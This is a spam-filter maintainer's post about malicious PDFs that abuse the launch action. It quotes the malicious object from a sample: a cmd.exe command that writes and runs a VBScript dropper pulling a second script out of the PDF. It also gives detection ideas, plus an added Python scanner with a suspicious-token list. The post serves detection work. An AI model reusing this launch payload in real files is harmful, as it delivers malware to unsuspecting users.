About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their "launch action".

Original article:
        http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
More info:
        http://www.sophos.com/blogs/sophoslabs/?p=9301

Yesterday morning, several of these showed up in my feeds.
Sample:
        http://puffin.net/software/spam/samples/0007_pdf_mal.txt


The bad news is that the social engineering part is well written
(terse with decent grammar in the body) and feels like the sort of
thing that would confuse/fool naive end users.

Based on which accounts they're hitting, these may have been
created by last year's inline-PNG/RTF guy (who I'm pretty sure
is behind the recent zipped JPEG and now RTF campaigns).
If that's correct, we should expect more attacks.  He's smarter
AND more patient than pretty much all other spammers (he might
even be as smart as a tree squirrel - scary!).


The good news is there's all manner of easy to detect stuff that
shouldn't occur in "normal" PDFs. :)

Here's just the nifty Launch part (NOTE: for skimming clarity, I
removed several blank lines from around the original "Click" line):

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs 
&& echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo 
pf=f.ReadAll  >> script.vbs && echo s=InStr(pf,"'SS")  >> script.vbs && echo 
e=InStr(pf,"'EE")  >> script.vbs && echo s=Mid(pf,s,e-s)  >> script.vbs && echo 
Set z=fso.OpenTextFile("batscript.vbs", 2, True)  >> script.vbs && echo s = 
Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs 
&& batscript.vbs
Click the "open" button to view this document:)
 >>
>>
endobj


I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added "script.vbs" to my instant-death PDF word
scans.
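
One way to implement such a backup rule, as an added example that is
not from the post: a small Python scanner that flags any /Launch action
(pulling out the /F target and the /P parameters, which in the sample
above span several lines) and then checks for a short token list such
as "script.vbs". The token list and the embedded sample fragment are
constructed for this example.

```python
import re

# Tokens the post treats as never appearing in "normal" PDFs (constructed
# list for this example, extended from the post's "script.vbs" rule).
SUSPICIOUS_TOKENS = (b"cmd.exe", b"script.vbs", b"CreateObject(")
# One indirect object, "N G obj ... endobj"; DOTALL because bodies span lines.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)

def literal_string(body: bytes, key: bytes):
    # Value of "/key (...)". PDF literal strings may span lines and hold
    # balanced parentheses, so count depth instead of stopping at the first ')'.
    m = re.search(rb"/" + key + rb"\s*\(", body)
    if not m:
        return None
    depth, i, out = 1, m.end(), bytearray()
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\":                      # keep escape pairs verbatim
            out += body[i:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        out += c
        i += 1
    return bytes(out)

def scan_pdf(data: bytes) -> list:
    # Flag every /Launch action with target and parameters, then any token hit.
    findings = []
    for num, _gen, body in OBJ_RE.findall(data):
        if re.search(rb"/S\s*/Launch\b", body):
            findings.append({"rule": "launch_action", "obj": int(num),
                             "target": literal_string(body, b"F"),
                             "params": literal_string(body, b"P")})
    for tok in SUSPICIOUS_TOKENS:
        if tok in data:
            findings.append({"rule": "token", "token": tok.decode()})
    return findings

# Constructed sample: a harmless catalog object plus a Launch action modelled
# on the one quoted in the post, with the command text shortened.
SAMPLE = (b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
          b"8 0 obj\n<<\n /Type /Action\n /S /Launch\n /Win\n <<\n"
          b"  /F (cmd.exe)\n  /P (/c echo Set f=x > script.vbs && script.vbs\n"
          b"Click the \"open\" button to view this document:)\n >>\n>>\nendobj\n")
```

Call scan_pdf(SAMPLE) to see the three findings, or feed it the raw bytes
of a real file; the token pass is the cheap general rule, the object
pass tells you which object carried the Launch action.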

I'll be asking some of my most diverse volunteers to run some
ham-PDF-only MassChecks tonight, and see if any of my new rules
mis-fire.  Given the number of times HTML "naughty" tags appear in
ham, I will resist assuming my "reasonable" restrictions won't hit
any.
        - "Chip"
